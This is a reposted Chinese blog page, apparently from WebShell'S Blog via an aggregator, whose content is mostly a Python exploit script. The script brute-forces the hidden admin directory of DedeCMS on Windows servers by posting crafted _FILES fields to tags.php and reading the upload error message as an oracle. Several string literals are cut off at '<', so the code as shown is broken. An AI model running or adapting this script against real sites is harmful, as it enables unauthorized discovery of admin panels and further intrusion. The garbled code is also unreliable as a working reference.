利用腳本python：

#!/usr/bin/env python

'''/*

* author = Mochazz

* team = 紅日安全團隊

* env = pyton3

*

*/

'''

import requests

import itertools

characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"

back_dir = ""

flag = 0

url = "http://192.168.1.9/tags.php"

data = {

"_FILES[mochazz][tmp_name]" : "./{p}<

"_FILES[mochazz][name]" : 0,

"_FILES[mochazz][size]" : 0,

"_FILES[mochazz][type]" : "image/gif"

}

for num in range(1,7):

if flag:

break

for pre in itertools.permutations(characters,num):

pre = ''.join(list(pre))

data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)

print("testing",pre)

r = requests.post(url,data=data)

if "Upload filetype not allow !" not in r.text and r.status_code == 200:

flag = 1

back_dir = pre

data["_FILES[mochazz][tmp_name]"] = "./{p}<

break

else:

data["_FILES[mochazz][tmp_name]"] = "./{p}<

print("[+] 前綴為：",back_dir)

flag = 0

for i in range(30):

if flag:

break

for ch in characters:

if ch == characters[-1]:

flag = 1

break

data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)

r = requests.post(url, data=data)

if "Upload filetype not allow !" not in r.text and r.status_code == 200:

back_dir += ch

print("[+] ",back_dir)

data["_FILES[mochazz][tmp_name]"] = "./{p}<

break

else:

data["_FILES[mochazz][tmp_name]"] = "./{p}<

print("后臺地址為：",back_dir)

演示結果：

轉載請注明來自WebShell'S Blog，本文地址：https://www.webshell.cc/6591.html

總結

以上是生活随笔為你收集整理的织梦服务器系统win10,WIN服务器爆破DEDECMS后台目录的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。